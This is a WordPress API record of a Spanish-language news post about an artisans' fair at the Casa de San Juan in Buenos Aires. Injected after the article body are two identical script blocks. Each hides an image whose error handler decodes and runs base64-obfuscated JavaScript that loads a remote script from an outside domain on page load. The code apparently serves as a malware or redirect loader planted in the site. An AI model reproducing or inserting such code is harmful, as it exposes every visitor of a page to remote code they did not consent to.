{"id":4402,"date":"2024-09-11T10:31:28","date_gmt":"2024-09-11T13:31:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4402"},"modified":"2025-08-13T23:48:47","modified_gmt":"2025-08-14T02:48:47","slug":"realizaran-una-muestra-en-la-casa-de-san-juan-en-buenos-aires","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4402","title":{"rendered":"Realizar\u00e1n una muestra en la Casa de San Juan en Buenos Aires"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d8f199006e660dcef3e0439a5c5147d2\" style=\"background-color:#096ba4\"><em>Ser\u00e1 este mi\u00e9rcoles 11 de septiembre en conmemoraci\u00f3n del \u201cD\u00eda del Maestro\u201d. La muestra contar\u00e1 con la exposici\u00f3n de productos realizados por emprendedores y artesanos provenientes de los 19 departamentos.<\/em><\/h4>\n\n\n\n<p>En el marco de las actividades organizadas por la Direcci\u00f3n de Econom\u00eda Social y la Casa de San Juan en Buenos Aires, por conmemorase el \u201cD\u00eda del Maestro\u201d este mi\u00e9rcoles 11 de septiembre, se llevar\u00e1 a cabo una muestra de emprendedores y artesanos en la Casa de San Juan en Buenos Aires ubicada en Sarmiento 125, Capital Federal.<\/p>\n\n\n\n<p>Este evento ofrecer\u00e1 a los asistentes la oportunidad de disfrutar de m\u00fasica en vivo, charlas informativas y degustaciones de productos regionales.<\/p>\n\n\n\n<p>La muestra contar\u00e1 con la exposici\u00f3n de productos realizados por emprendedores y artesanos provenientes de los 19 departamentos, lo que permitir\u00e1 exhibir la riqueza cultural. Se busca acercar as\u00ed la cultura sanjuanina a la capital del pa\u00eds.<\/p>\n\n\n\n<p>La exposici\u00f3n presentar\u00e1 una colecci\u00f3n de marroquiner\u00eda, vitrofusi\u00f3n, trabajos en madera, orfebrer\u00eda, herborister\u00eda artesanal, adem\u00e1s de una variedad de accesorios realizados en macram\u00e9 y arcilla. Estos trabajos no solo destacan la destreza artesanal, sino que tambi\u00e9n reflejan la dedicaci\u00f3n y pasi\u00f3n en cada pieza.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/sisanjuan.gob.ar\/23-desarrollo-humano\/2024-09-11\/58002-se-viene-una-muestra-de-emprendedores-y-artesanos-en-la-casa-de-san-juan-en-buenos-aires\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/sisanjuan.b-cdn.net\/images\/logos\/SISJ_logo_H_positivo.png\" alt=\"\" style=\"width:249px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 este mi\u00e9rcoles 11 de septiembre en conmemoraci\u00f3n del \u201cD\u00eda del Maestro\u201d. La muestra contar\u00e1 con la exposici\u00f3n de productos realizados por emprendedores y artesanos provenientes de los 19 departamentos. En el marco de las actividades organizadas por la Direcci\u00f3n de Econom\u00eda Social y la Casa de San Juan en Buenos Aires, por conmemorase el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4403,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4402","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4402"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4402"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4402\/revisions"}],"predecessor-version":[{"id":6684,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4402\/revisions\/6684"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4403"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4402"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4402"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}